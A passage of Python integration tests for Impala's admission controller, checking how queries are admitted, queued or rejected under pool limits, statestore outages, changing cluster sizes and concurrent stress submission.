exec_summary_resp.summary.is_queued assert "number of running queries 1 is at or over limit 1" in \ exec_summary_resp.summary.queued_reason,\ exec_summary_resp.summary.queued_reason # Close the running query. self.close(long_query_resp.operationHandle) # Close the queued query. self.close(queued_query_resp.operationHandle) @pytest.mark.execute_serially @CustomClusterTestSuite.with_args( impalad_args=impalad_admission_ctrl_flags(max_requests=1, max_queued=3, pool_max_mem=1024 * 1024 * 1024) + " --admission_control_stale_topic_threshold_ms={0}".format( STALE_TOPIC_THRESHOLD_MS), statestored_args=_STATESTORED_ARGS) def test_statestore_outage(self): """Test behaviour with a failed statestore. Queries should continue to be admitted but we should generate diagnostics about the stale topic.""" self.cluster.statestored.kill() impalad = self.cluster.impalads[0] # Sleep until the update should be definitely stale. sleep(STALE_TOPIC_THRESHOLD_MS / 1000. * 1.5) ac_json = impalad.service.get_debug_webpage_json('/admission') ms_since_update = ac_json["statestore_admission_control_time_since_last_update_ms"] assert ms_since_update > STALE_TOPIC_THRESHOLD_MS assert ("Warning: admission control information from statestore is stale:" in ac_json["statestore_update_staleness_detail"]) # Submit a batch of queries. One should get to run, one will be rejected because # of the full queue, and the others will run after being queued. 
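    # With max_requests=1 and max_queued=3, the expected outcome for the 5 queries below
    # is: 1 admitted immediately, 3 admitted after queueing, and 1 rejected because the
    # queue is full; every admitted or queued profile should also carry the staleness
    # warning since the statestore is down.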
STMT = "select sleep(100)" TIMEOUT_S = 60 NUM_QUERIES = 5 profiles = self._execute_and_collect_profiles([STMT for i in xrange(NUM_QUERIES)], TIMEOUT_S, allow_query_failure=True) ADMITTED_STALENESS_WARNING = \ "Warning: admission control information from statestore is stale" ADMITTED_STALENESS_PROFILE_ENTRY = \ "Admission control state staleness: " + ADMITTED_STALENESS_WARNING num_queued = 0 num_admitted_immediately = 0 num_rejected = 0 for profile in profiles: if "Admission result: Admitted immediately" in profile: assert ADMITTED_STALENESS_PROFILE_ENTRY in profile, profile num_admitted_immediately += 1 elif "Admission result: Rejected" in profile: num_rejected += 1 # Check that the rejection error returned to the client contains a warning. query_statuses = [line for line in profile.split("\n") if "Query Status:" in line] assert len(query_statuses) == 1, profile assert ADMITTED_STALENESS_WARNING in query_statuses[0] else: assert "Admission result: Admitted (queued)" in profile, profile assert ADMITTED_STALENESS_PROFILE_ENTRY in profile, profile # Check that the queued reason contains a warning. queued_reasons = [line for line in profile.split("\n") if "Initial admission queue reason:" in line] assert len(queued_reasons) == 1, profile assert ADMITTED_STALENESS_WARNING in queued_reasons[0] num_queued += 1 assert num_admitted_immediately == 1 assert num_queued == 3 assert num_rejected == NUM_QUERIES - num_admitted_immediately - num_queued @pytest.mark.execute_serially @CustomClusterTestSuite.with_args(impalad_args=impalad_admission_ctrl_config_args( fs_allocation_file="fair-scheduler-test2.xml", llama_site_file="llama-site-test2.xml"), statestored_args=_STATESTORED_ARGS) def test_scalable_config(self, vector): """ Test that the scalable configuration parameters scale as the cluster size changes. """ # Start with 3 Impalads coordinator = self.cluster.impalads[0] impalad_1 = self.cluster.impalads[1] impalad_2 = self.cluster.impalads[2] self.__check_admission_by_counts(expected_num_impalads=3) # The mem_limit values that are passed to __check_admission_by_memory are based on # the memory used by the query when run on clusters of varying sizes, but mem_limit # is used in the test to make the test deterministic in the presence of changing # memory estimates. self.__check_admission_by_memory(True, '85M') # Kill an Impalad, now there are 2. impalad_1.kill_and_wait_for_exit() coordinator.service.wait_for_num_known_live_backends(2) self.__check_admission_by_counts(expected_num_impalads=2) self.__check_admission_by_memory(False, '125M', 'is greater than pool max mem resources 200.00 MB' ' (calculated as 2 backends each with 100.00 MB)') # Restart an Impalad, now there are 3 again. impalad_1.start(wait_until_ready=True) coordinator.service.wait_for_num_known_live_backends(3) self.__check_admission_by_counts(expected_num_impalads=3) self.__check_admission_by_memory(True, '85M') # Kill 2 Impalads, now there are 1. impalad_1.kill_and_wait_for_exit() impalad_2.kill_and_wait_for_exit() coordinator.service.wait_for_num_known_live_backends(1) self.__check_admission_by_counts(expected_num_impalads=1) self.__check_admission_by_memory(False, '135M', 'is greater than pool max mem resources 100.00 MB' ' (calculated as 1 backends each with 100.00 MB)') # Restart 2 Impalads, now there are 3 again. 
impalad_1.start(wait_until_ready=True) impalad_2.start(wait_until_ready=True) coordinator.service.wait_for_num_known_live_backends(3) self.__check_admission_by_counts(expected_num_impalads=3) self.__check_admission_by_memory(True, '85M') def __check_admission_by_memory(self, expected_admission, mem_limit, expected_rejection_reason=None): """ Test if a query can run against the current cluster. :param mem_limit set in the client configuration to limit query memory. :param expected_admission: True if admission is expected. :param expected_rejection_reason: a string expected to be in the reason for rejection. """ query = "select * from functional.alltypesagg order by int_col limit 1" profiles = self._execute_and_collect_profiles([query], timeout_s=60, allow_query_failure=True, config_options={'request_pool': 'root.queueE', 'mem_limit': mem_limit}) assert len(profiles) == 1 profile = profiles[0] if "Admission result: Admitted immediately" in profile: did_admit = True elif "Admission result: Rejected" in profile: did_admit = False num_rejected, rejected_reasons = self.parse_profiles_rejected(profiles) assert num_rejected == 1 assert expected_rejection_reason is not None, rejected_reasons[0] assert expected_rejection_reason in rejected_reasons[0], profile else: assert "Admission result: Admitted (queued)" in profile, profile assert 0, "should not queue based on memory" assert did_admit == expected_admission, profile def __check_admission_by_counts(self, expected_num_impalads): """ Run some queries, find how many were admitted, queued or rejected, and check that AdmissionController correctly enforces query count limits based in the configuration in llama-site-test2.xml. """ NUM_QUERIES = 6 # Set expected values based on expected_num_impalads. # We can run 1 query per backend for queueE from llama-site-test2.xml. expected_num_admitted = expected_num_impalads # The value of max-queued-queries-multiple for queueE from llama-site-test2.xml. QUERIES_MULTIPLE = 0.6 expected_num_queued = int(math.ceil(expected_num_impalads * QUERIES_MULTIPLE)) expected_num_rejected = NUM_QUERIES - (expected_num_admitted + expected_num_queued) impalad = self.cluster.impalads[0] client = impalad.service.create_beeswax_client() client.set_configuration({'request_pool': 'root.queueE'}) result = client.execute("select 1") # Query should execute in queueE. self.__check_query_options(result.runtime_profile, ['REQUEST_POOL=root.queueE']) STMT = "select sleep(1000)" TIMEOUT_S = 60 profiles = self._execute_and_collect_profiles([STMT for i in xrange(NUM_QUERIES)], TIMEOUT_S, allow_query_failure=True, config_options={'request_pool': 'root.queueE'}) # Check admitted queries num_admitted_immediately = self.parse_profiles_admitted(profiles) assert num_admitted_immediately == expected_num_admitted # Check queued queries. num_queued, queued_reasons = self.parse_profiles_queued(profiles) assert num_queued == expected_num_queued assert len(queued_reasons) == num_queued expected_queue_reason = ( "number of running queries {0} is at or over limit {1}".format( expected_num_admitted, expected_num_admitted) ) # The first query to get queued sees expected_queue_reason. assert len([s for s in queued_reasons if expected_queue_reason in s]) == 1 # Subsequent queries that are queued see that the queue is not empty. 
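    # For example, with 3 impalads and 6 queries: 3 should be admitted, ceil(3 * 0.6) = 2
    # should be queued (1 seeing the "over limit" reason, 1 seeing "queue is not empty"),
    # and the remaining 1 should be rejected with the queue-full message below.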
expected_see_non_empty_queue = max(expected_num_queued - 1, 0) assert len([s for s in queued_reasons if "queue is not empty" in s]) == expected_see_non_empty_queue # Check rejected queries num_rejected, rejected_reasons = self.parse_profiles_rejected(profiles) assert num_rejected == expected_num_rejected expected_rejection_reason = ( "Rejected query from pool root.queueE: queue full, " "limit={0} (calculated as {1} backends each with 0.6 queries)".format( expected_num_queued, expected_num_impalads) ) assert len([s for s in rejected_reasons if expected_rejection_reason in s]) == expected_num_rejected def parse_profiles_queued(self, profiles): """ Parse a list of Profile strings and sum the counts of queries queued. :param profiles: a list of query profiles to parse. :return: The number queued. """ num_queued = 0 queued_reasons_return = [] for profile in profiles: if "Admission result: Admitted (queued)" in profile: queued_reasons = [line for line in profile.split("\n") if "Initial admission queue reason:" in line] assert len(queued_reasons) == 1, profile num_queued += 1 queued_reasons_return.append(queued_reasons[0]) return num_queued, queued_reasons_return def parse_profiles_admitted(self, profiles): """ Parse a list of Profile strings and sum the counts of queries admitted immediately. :param profiles: a list of query profiles to parse. :return: The number admitted immediately. """ num_admitted_immediately = 0 for profile in profiles: if "Admission result: Admitted immediately" in profile: num_admitted_immediately += 1 return num_admitted_immediately def parse_profiles_rejected(self, profiles): """ Parse a list of Profile strings and sum the counts of queries rejected. :param profiles: a list of query profiles to parse. :return: The number rejected. """ num_rejected = 0 rejected_reasons_return = [] for profile in profiles: if "Admission result: Rejected" in profile: num_rejected += 1 query_statuses = [line for line in profile.split("\n") if "Query Status:" in line] assert len(query_statuses) == 1, profile rejected_reasons_return.append(query_statuses[0]) return num_rejected, rejected_reasons_return @pytest.mark.execute_serially def test_impala_server_startup_delay(self): """This test verifies that queries get queued when the coordinator has already started accepting client connections during startup, but the local backend descriptor is not yet available.""" server_start_delay_s = 20 # We need to start the cluster here instead of during setup_method() so we can launch # it from a separate thread. def start_cluster(): LOG.info("Starting cluster") impalad_args = "--debug_actions=IMPALA_SERVER_END_OF_START:SLEEP@%s" % ( 1000 * server_start_delay_s) self._start_impala_cluster(['--impalad_args=%s' % impalad_args]) # Initiate the cluster start start_cluster_thread = threading.Thread(target=start_cluster) start_cluster_thread.start() # Wait some time to arrive at IMPALA_SERVER_END_OF_START sleep(server_start_delay_s) # With a new client, execute a query and observe that it gets queued and ultimately # succeeds. client = self.create_impala_client() result = self.execute_query_expect_success(client, "select 1") start_cluster_thread.join() profile = result.runtime_profile reasons = self.__extract_init_queue_reasons([profile]) assert len(reasons) == 1 assert "Local backend has not started up yet." 
 in reasons[0]

  @pytest.mark.execute_serially
  @CustomClusterTestSuite.with_args(num_exclusive_coordinators=1)
  def test_release_backends(self, vector):
    """Test that executor backends are shut down when they complete, that completed
    executor backends release their admitted memory, and that NumCompletedBackends is
    updated each time an executor backend completes."""
    if self.exploration_strategy() != 'exhaustive':
      pytest.skip('runs only in exhaustive')
    # Craft a query where part of the executor backends completes, while the rest remain
    # running indefinitely. The query forces the 'lineitem' table to be treated as the
    # small table even though it is bigger than the 'customer' table. This forces the
    # small table scan ('lineitem' scan) to run on two nodes and the big table scan
    # ('customers' scan) to run on a single node. By using debug actions to force the
    # big table scan to hang indefinitely, the small table scan should finish quickly.
    # This causes one executor backend to complete quickly, and causes the other one to
    # hang.
    vector.get_value('exec_option')['debug_action'] = '0:GETNEXT:WAIT'
    query = "select STRAIGHT_JOIN * from tpch.customer JOIN /* +BROADCAST */ " \
        "tpch.lineitem where customer.c_custkey = lineitem.l_orderkey limit 100"
    # Amount of time to wait for the query to reach the running state before throwing a
    # Timeout exception.
    timeout = 10
    handle = self.execute_query_async(query, vector.get_value('exec_option'))
    try:
      # Wait for the query to reach the running state (it should never reach the
      # finished state because of the 'WAIT' debug action), wait for the 'lineitem'
      # scan to complete, and then validate that one of the executor backends shuts
      # down and releases its admitted memory.
      self.wait_for_state(handle, self.client.QUERY_STATES['RUNNING'], timeout)
      sleep(10)  # Wait for the 'lineitem' scan to complete
      assert "NumCompletedBackends: 1 (1)" in self.client.get_runtime_profile(handle)
      assert get_num_completed_backends(self.cluster.impalads[0].service,
          handle.get_handle().id) == 1
      mem_admitted = get_mem_admitted_backends_debug_page(self.cluster)
      num_executor_zero_admitted = 0
      for executor_mem_admitted in mem_admitted['executor']:
        if executor_mem_admitted == 0:
          num_executor_zero_admitted += 1
      assert num_executor_zero_admitted == 1
    finally:
      # Once the query is closed, validate that all backends have shut down.
      self.client.close_query(handle)
      mem_admitted = get_mem_admitted_backends_debug_page(self.cluster)
      assert mem_admitted['coordinator'] == 0
      for executor_mem_admitted in mem_admitted['executor']:
        assert executor_mem_admitted == 0


class TestAdmissionControllerStress(TestAdmissionControllerBase):
  """Submits a number of queries (parameterized) with some delay between submissions
  (parameterized) and the ability to submit to one impalad or many in a round-robin
  fashion. Each query is submitted on a separate thread. After admission, the query
  thread will block with the query open and wait for the main thread to notify it to
  end its query. The query thread can end its query by fetching to the end, cancelling
  itself, closing itself, or waiting for the query timeout to take effect. Depending on
  the test parameters a varying number of queries will be admitted, queued, and
  rejected. After the queries are admitted, the main thread will request each admitted
  query thread to end its query and allow queued queries to be admitted.
The test tracks the state of the admission controller using the metrics from each impalad to do the following: (1) After submitting all queries, the change in metrics for the number of admitted, queued, and rejected requests should sum to the number of queries and that the values are reasonable given the test parameters. (2) While there are running queries: * Request the currently running queries to end and wait for the queries to end. Verify the metric for the number of completed queries. The threads that submitted those queries will keep their connections open until the entire test completes. This verifies that admission control is tied to the end of the query and does not depend on closing the connection. * Check that queued requests are then dequeued and verify using the metric for the number of dequeued requests. The threads that were waiting to submit the query should then insert themselves into a list of currently running queries and then wait for a notification from the main thread. (3) After all queries have completed, check that the final number of admitted, queued, and rejected requests are reasonable given the test parameters. When submitting to a single impalad, we know exactly what the values should be, otherwise we just check that they are within reasonable bounds. """ @classmethod def add_test_dimensions(cls): super(TestAdmissionControllerStress, cls).add_test_dimensions() cls.ImpalaTestMatrix.add_dimension( ImpalaTestDimension('num_queries', *NUM_QUERIES)) cls.ImpalaTestMatrix.add_dimension( ImpalaTestDimension('round_robin_submission', *ROUND_ROBIN_SUBMISSION)) cls.ImpalaTestMatrix.add_dimension( ImpalaTestDimension('submission_delay_ms', *SUBMISSION_DELAY_MS)) # Additional constraints for code coverage jobs and core. num_queries = None if ImpalaTestClusterProperties.get_instance().has_code_coverage(): # Code coverage builds can't handle the increased concurrency. num_queries = 15 elif cls.exploration_strategy() == 'core': num_queries = 30 cls.ImpalaTestMatrix.add_constraint( lambda v: v.get_value('submission_delay_ms') == 0) cls.ImpalaTestMatrix.add_constraint( lambda v: v.get_value('round_robin_submission')) if num_queries is not None: cls.ImpalaTestMatrix.add_constraint( lambda v: v.get_value('num_queries') == num_queries) def setup(self): # All threads are stored in this list and it's used just to make sure we clean up # properly in teardown. self.all_threads = list() # Each submission thread will append() itself to this list if the query begins # execution. The main thread will access this list to determine which threads are # executing queries that can be cancelled (it will pop() elements from the front of # the list). The individual operations on the list are atomic and thread-safe thanks # to the GIL. self.executing_threads = list() def teardown(self): # Set shutdown for all threads (cancel if needed) for thread in self.all_threads: try: thread.lock.acquire() thread.shutdown = True if thread.query_handle is not None: LOG.debug("Attempt to clean up thread executing query %s (state %s)", thread.query_num, thread.query_state) client = thread.impalad.service.create_beeswax_client() try: client.cancel(thread.query_handle) finally: client.close() finally: thread.lock.release() # Wait for all threads to exit for thread in self.all_threads: thread.join(5) LOG.debug("Join thread for query num %s %s", thread.query_num, "TIMED OUT" if thread.isAlive() else "") def get_admission_metrics(self): """ Returns a map of the admission metrics, aggregated across all of the impalads. 
The metrics names are shortened for brevity: 'admitted', 'queued', 'dequeued', 'rejected', 'released', and 'timed-out'. """ metrics = {'admitted': 0, 'queued': 0, 'dequeued': 0, 'rejected': 0, 'released': 0, 'timed-out': 0} for impalad in self.impalads: keys = [metric_key(self.pool_name, 'total-%s' % short_name) for short_name in metrics.keys()] values = impalad.service.get_metric_values(keys, [0] * len(keys)) for short_name, value in zip(metrics.keys(), values): metrics[short_name] += value return metrics def get_consistent_admission_metrics(self, num_submitted): """Same as get_admission_metrics() except retries until it gets consistent metrics for num_submitted queries. See IMPALA-6227 for an example of problems with inconsistent metrics where a dequeued query is reflected in dequeued but not admitted.""" ATTEMPTS = 5 for i in xrange(ATTEMPTS): metrics = self.get_admission_metrics() admitted_immediately = num_submitted - metrics['queued'] - metrics['rejected'] if admitted_immediately + metrics['dequeued'] == metrics['admitted']: return metrics LOG.info("Got inconsistent metrics {0}".format(metrics)) assert False, "Could not get consistent metrics for {0} queries after {1} attempts: "\ "{2}".format(num_submitted, ATTEMPTS, metrics) def wait_for_metric_changes(self, metric_names, initial, expected_delta): """ Waits for the sum of metrics in metric_names to change by at least expected_delta. This is similar to ImpalaService.wait_for_metric_value(), but it uses one or more metrics aggregated across all impalads, e.g. we want to wait for the total number of admitted, queued, and rejected metrics to change some amount in total, but we don't know exactly how the metrics will change individually. 'metric_names' is a list of the keys returned by get_admission_metrics() which are expected to change. 'initial' is the initial set of metrics returned by get_admission_metrics() to compare against. 'expected_delta' is the total change expected across all impalads for the specified metrics. 
""" log_metrics("wait_for_metric_changes, initial=", initial) current = initial start_time = time() while True: current = self.get_admission_metrics() log_metrics("wait_for_metric_changes, current=", current) deltas = compute_metric_deltas(current, initial) delta_sum = sum([deltas[x] for x in metric_names]) LOG.info("DeltaSum=%s Deltas=%s (Expected=%s for metrics=%s)", delta_sum, deltas, expected_delta, metric_names) if delta_sum >= expected_delta: LOG.info("Found all %s metrics after %s seconds", delta_sum, round(time() - start_time, 1)) return (deltas, current) assert (time() - start_time < STRESS_TIMEOUT),\ "Timed out waiting {0} seconds for metrics {1} delta {2} "\ "current {3} initial {4}" .format( STRESS_TIMEOUT, ','.join(metric_names), expected_delta, str(current), str(initial)) sleep(1) def wait_for_statestore_updates(self, heartbeats): """Waits for a number of admission control statestore updates from all impalads.""" start_time = time() init = dict() curr = dict() for impalad in self.impalads: init[impalad] = impalad.service.get_metric_value( REQUEST_QUEUE_UPDATE_INTERVAL)['count'] curr[impalad] = init[impalad] while True: LOG.debug("wait_for_statestore_updates: curr=%s, init=%s, d=%s", curr.values(), init.values(), [curr[i] - init[i] for i in self.impalads]) if all([curr[i] - init[i] >= heartbeats for i in self.impalads]): break for impalad in self.impalads: curr[impalad] = impalad.service.get_metric_value( REQUEST_QUEUE_UPDATE_INTERVAL)['count'] assert (time() - start_time < STRESS_TIMEOUT),\ "Timed out waiting %s seconds for heartbeats" % (STRESS_TIMEOUT,) sleep(STATESTORE_RPC_FREQUENCY_MS / float(1000)) LOG.info("Waited %s for %s heartbeats", round(time() - start_time, 1), heartbeats) def wait_for_admitted_threads(self, num_threads): """ Wait for query submission threads to update after being admitted, as determined by observing metric changes. This is necessary because the metrics may change before the execute_async() calls on the query threads return and add themselves to self.executing_threads. """ start_time = time() LOG.info("Waiting for %s threads to begin execution", num_threads) # All individual list operations are thread-safe, so we don't need to use a # lock to synchronize before checking the list length (on which another thread # may call append() concurrently). while len(self.executing_threads) < num_threads: assert (time() - start_time < STRESS_TIMEOUT), ("Timed out waiting %s seconds for " "%s admitted client rpcs to return. Only %s executing " % ( STRESS_TIMEOUT, num_threads, len(self.executing_threads))) sleep(0.1) LOG.info("Found all %s admitted threads after %s seconds", num_threads, round(time() - start_time, 1)) def end_admitted_queries(self, num_queries): """ Requests each admitted query to end its query. """ assert len(self.executing_threads) >= num_queries LOG.info("Requesting {0} clients to end queries".format(num_queries)) # Request admitted clients to end their queries current_executing_queries = [] for i in xrange(num_queries): # pop() is thread-safe, it's OK if another thread is appending concurrently. 
thread = self.executing_threads.pop(0) LOG.info("Cancelling query %s", thread.query_num) assert thread.query_state == 'ADMITTED' current_executing_queries.append(thread) thread.query_state = 'REQUEST_QUERY_END' # Wait for the queries to end start_time = time() while True: all_done = True for thread in self.all_threads: if thread.query_state == 'REQUEST_QUERY_END': all_done = False if all_done: break assert (time() - start_time < STRESS_TIMEOUT),\ "Timed out waiting %s seconds for query end" % (STRESS_TIMEOUT,) sleep(1) class SubmitQueryThread(threading.Thread): def __init__(self, impalad, additional_query_options, vector, query_num, query_end_behavior, executing_threads): """ executing_threads must be provided so that this thread can add itself when the query is admitted and begins execution. """ super(self.__class__, self).__init__() self.executing_threads = executing_threads self.vector = vector self.additional_query_options = additional_query_options self.query_num = query_num self.query_end_behavior = query_end_behavior self.impalad = impalad self.error = None # query_state is defined and used only by the test code, not a property exposed by # the server self.query_state = 'NOT_SUBMITTED' # lock protects query_handle and shutdown, used by the main thread in teardown() self.lock = threading.RLock() self.query_handle = None self.shutdown = False # Set by the main thread when tearing down def run(self): client = None try: try: # Take the lock while query_handle is being created to avoid an unlikely race # condition with teardown() (i.e. if an error occurs on the main thread), and # check if the test is already shut down. self.lock.acquire() if self.shutdown: return exec_options = self.vector.get_value('exec_option') exec_options.update(self.additional_query_options) query = QUERY.format(self.query_num) self.query_state = 'SUBMITTING' client = self.impalad.service.create_beeswax_client() ImpalaTestSuite.change_database(client, self.vector.get_value('table_format')) client.set_configuration(exec_options) if self.query_end_behavior == 'QUERY_TIMEOUT': client.execute("SET QUERY_TIMEOUT_S={0}".format(QUERY_END_TIMEOUT_S)) LOG.info("Submitting query %s", self.query_num) self.query_handle = client.execute_async(query) client.wait_for_admission_control(self.query_handle) admission_result = client.get_admission_result(self.query_handle) assert len(admission_result) > 0 if "Rejected" in admission_result: LOG.info("Rejected query %s", self.query_num) self.query_state = 'REJECTED' self.query_handle = None return elif "Timed out" in admission_result: LOG.info("Query %s timed out", self.query_num) self.query_state = 'TIMED OUT' self.query_handle = None return LOG.info("Admission result for query %s : %s", self.query_num, admission_result) except ImpalaBeeswaxException as e: LOG.exception(e) raise e finally: self.lock.release() LOG.info("Admitted query %s", self.query_num) self.query_state = 'ADMITTED' # The thread becomes visible to the main thread when it is added to the # shared list of executing_threads. append() is atomic and thread-safe. self.executing_threads.append(self) # Synchronize with the main thread. At this point, the thread is executing a # query. It needs to wait until the main thread requests it to end its query. while not self.shutdown: # The QUERY_TIMEOUT needs to stay active until the main thread requests it # to end. Otherwise, the query may get cancelled early. Fetch rows 2 times # per QUERY_TIMEOUT interval to keep the query active. 
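        # (The sleep(QUERY_END_TIMEOUT_S * 0.5) at the bottom of this loop gives roughly
        # two fetches per timeout interval while the query is still running.)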
if self.query_end_behavior == 'QUERY_TIMEOUT' and \ self.query_state != 'COMPLETED': fetch_result = client.fetch(query, self.query_handle, 1) assert len(fetch_result.data) == 1, str(fetch_result) if self.query_state == 'REQUEST_QUERY_END': self._end_query(client, query) # The query has released admission control resources self.query_state = 'COMPLETED' self.query_handle = None sleep(QUERY_END_TIMEOUT_S * 0.5) except Exception as e: LOG.exception(e) # Unknown errors will be raised later self.error = e self.query_state = 'ERROR' finally: LOG.info("Thread terminating in state=%s", self.query_state) if client is not None: client.close() def _end_query(self, client, query): """Bring the query to the appropriate end state defined by self.query_end_behaviour. Returns once the query has reached that state.""" LOG.info("Ending query %s by %s", str(self.query_handle.get_handle()), self.query_end_behavior) if self.query_end_behavior == 'QUERY_TIMEOUT': # Sleep and wait for the query to be cancelled. The cancellation will # set the state to EXCEPTION. start_time = time() while (client.get_state(self.query_handle) != client.QUERY_STATES['EXCEPTION']): assert (time() - start_time < STRESS_TIMEOUT),\ "Timed out waiting %s seconds for query cancel" % (STRESS_TIMEOUT,) sleep(1) elif self.query_end_behavior == 'EOS': # Fetch all rows so we hit eos. client.fetch(query, self.query_handle) elif self.query_end_behavior == 'CLIENT_CANCEL': client.cancel(self.query_handle) else: assert self.query_end_behavior == 'CLIENT_CLOSE' client.close_query(self.query_handle) def _check_queries_page_resource_pools(self): """Checks that all queries in the '/queries' webpage json have the correct resource pool (this is called after all queries have been admitted, queued, or rejected, so they should already have the pool set), or no pool for queries that don't go through admission control.""" for impalad in self.impalads: queries_json = impalad.service.get_debug_webpage_json('/queries') for query in itertools.chain(queries_json['in_flight_queries'], queries_json['completed_queries']): if query['stmt_type'] == 'QUERY' or query['stmt_type'] == 'DML': assert query['last_event'] != 'Registered' and \ query['last_event'] != 'Planning finished' assert query['resource_pool'] == self.pool_name else: assert query['resource_pool'] == '' def _get_queries_page_num_queued(self): """Returns the number of queries currently in the 'queued' state from the '/queries' webpage json""" num_queued = 0 for impalad in self.impalads: queries_json = impalad.service.get_debug_webpage_json('/queries') for query in queries_json['in_flight_queries']: if query['last_event'] == 'Queued': num_queued += 1 return num_queued def run_admission_test(self, vector, additional_query_options): LOG.info("Starting test case with parameters: %s", vector) self.impalads = self.cluster.impalads round_robin_submission = vector.get_value('round_robin_submission') submission_delay_ms = vector.get_value('submission_delay_ms') if not round_robin_submission: self.impalads = [self.impalads[0]] num_queries = vector.get_value('num_queries') assert num_queries >= MAX_NUM_CONCURRENT_QUERIES + MAX_NUM_QUEUED_QUERIES initial_metrics = self.get_admission_metrics() log_metrics("Initial metrics: ", initial_metrics) for query_num in xrange(num_queries): impalad = self.impalads[query_num % len(self.impalads)] query_end_behavior = QUERY_END_BEHAVIORS[query_num % len(QUERY_END_BEHAVIORS)] thread = self.SubmitQueryThread(impalad, additional_query_options, vector, query_num, query_end_behavior, 
self.executing_threads) thread.start() self.all_threads.append(thread) sleep(submission_delay_ms / 1000.0) # Wait for the admission control to make the initial admission decision for all of # the queries. They should either be admitted immediately, queued, or rejected. # The test query is chosen that it with remain active on all backends until the test # ends the query. This prevents queued queries from being dequeued in the background # without this thread explicitly ending them, so that the test can admit queries in # discrete waves. LOG.info("Wait for initial admission decisions") (metric_deltas, curr_metrics) = self.wait_for_metric_changes( ['admitted', 'queued', 'rejected'], initial_metrics, num_queries) # Also wait for the test threads that submitted the queries to start executing. self.wait_for_admitted_threads(metric_deltas['admitted']) # Check that the admission decisions are reasonable given the test parameters # The number of admitted and queued requests should be at least the configured limits # but less than or equal to those limits times the number of impalads. assert metric_deltas['dequeued'] == 0,\ "Queued queries should not run until others are made to finish" assert metric_deltas['admitted'] >= MAX_NUM_CONCURRENT_QUERIES,\ "Admitted fewer than expected queries" assert metric_deltas['admitted'] <= MAX_NUM_CONCURRENT_QUERIES * len(self.impalads),\ "Admitted more than expected queries: at least one daemon over-admitted" assert metric_deltas['queued'] >=\ min(num_queries - metric_deltas['admitted'], MAX_NUM_QUEUED_QUERIES),\ "Should have queued more queries before rejecting them" assert metric_deltas['queued'] <= MAX_NUM_QUEUED_QUERIES * len(self.impalads),\ "Queued too many queries: at least one daemon queued too many" assert metric_deltas['rejected'] + metric_deltas['admitted'] +\ metric_deltas['queued'] == num_queries,\ "Initial admission decisions don't add up to {0}: {1}".format( num_queries, str(metric_deltas)) initial_metric_deltas = metric_deltas # Like above, check that the count from the queries webpage json is reasonable. queries_page_num_queued = self._get_queries_page_num_queued() assert queries_page_num_queued >=\ min(num_queries - metric_deltas['admitted'], MAX_NUM_QUEUED_QUERIES) assert queries_page_num_queued <= MAX_NUM_QUEUED_QUERIES * len(self.impalads) self._check_queries_page_resource_pools() # Admit queries in waves until all queries are done. A new wave of admission # is started by killing some of the running queries. while len(self.executing_threads) > 0: curr_metrics = self.get_consistent_admission_metrics(num_queries) log_metrics("Main loop, curr_metrics: ", curr_metrics) num_to_end = len(self.executing_threads) LOG.info("Main loop, will request %s queries to end", num_to_end) self.end_admitted_queries(num_to_end) self.wait_for_metric_changes(['released'], curr_metrics, num_to_end) num_queued_remaining =\ curr_metrics['queued'] - curr_metrics['dequeued'] - curr_metrics['timed-out'] expected_admitted = min(num_queued_remaining, MAX_NUM_CONCURRENT_QUERIES) (metric_deltas, _) = self.wait_for_metric_changes( ['admitted', 'timed-out'], curr_metrics, expected_admitted) # The queue timeout is set high for these tests, so we don't expect any queries to # time out. 
assert metric_deltas['admitted'] >= expected_admitted assert metric_deltas['timed-out'] == 0 self.wait_for_admitted_threads(metric_deltas['admitted']) # Wait a few topic updates to ensure the admission controllers have reached a steady # state or we may find an impalad dequeue more requests after we capture metrics. self.wait_for_statestore_updates(10) final_metrics = self.get_consistent_admission_metrics(num_queries) log_metrics("Final metrics: ", final_metrics) metric_deltas = compute_metric_deltas(final_metrics, initial_metrics) assert metric_deltas['timed-out'] == 0 if round_robin_submission: min_expected_admitted = MAX_NUM_CONCURRENT_QUERIES + MAX_NUM_QUEUED_QUERIES assert metric_deltas['admitted'] >= min_expected_admitted assert metric_deltas['admitted'] <= min_expected_admitted * len(self.impalads) assert metric_deltas['admitted'] ==\ initial_metric_deltas['admitted'] + initial_metric_deltas['queued'] assert metric_deltas['queued'] == initial_metric_deltas['queued'] assert metric_deltas['rejected'] == initial_metric_deltas['rejected'] else: # We shouldn't go over the max number of queries or queue size so we can compute # the expected number of queries that should have been admitted (which includes the # number queued as they eventually get admitted as well), queued, and rejected expected_admitted = MAX_NUM_CONCURRENT_QUERIES + MAX_NUM_QUEUED_QUERIES assert metric_deltas['admitted'] == expected_admitted assert metric_deltas['queued'] == MAX_NUM_QUEUED_QUERIES assert metric_deltas['rejected'] == num_queries - expected_admitted # All queries should be completed by now. queries_page_num_queued = self._get_queries_page_num_queued() assert queries_page_num_queued == 0 self._check_queries_page_resource_pools() for thread in self.all_threads: if thread.error is not None: raise thread.error @pytest.mark.execute_serially @SkipIfOS.redhat6 @CustomClusterTestSuite.with_args( impalad_args=impalad_admission_ctrl_flags(max_requests=MAX_NUM_CONCURRENT_QUERIES, max_queued=MAX_NUM_QUEUED_QUERIES, pool_max_mem=-1, queue_wait_timeout_ms=600000), statestored_args=_STATESTORED_ARGS) def test_admission_controller_with_flags(self, vector): if self.exploration_strategy() != 'exhaustive': pytest.skip('runs only in exhaustive') self.pool_name = 'default-pool' # The pool has no mem resources set, so submitting queries with huge mem_limits # should be fine. This exercises the code that does the per-pool memory # accounting (see MemTracker::GetPoolMemReserved()) without actually being throttled. self.run_admission_test(vector, {'request_pool': self.pool_name, 'mem_limit': sys.maxint}) @pytest.mark.execute_serially @SkipIfOS.redhat6 @CustomClusterTestSuite.with_args( impalad_args=impalad_admission_ctrl_config_args( fs_allocation_file="fair-scheduler-test2.xml", llama_site_file="llama-site-test2.xml"), statestored_args=_STATESTORED_ARGS) def test_admission_controller_with_configs(self, vector): self.pool_name = 'root.queueB' self.run_admission_test(vector, {'request_pool': self.pool_name}) def get_proc_limit(self): """Gets the process mem limit as reported by the impalad's mem-tracker metric. 
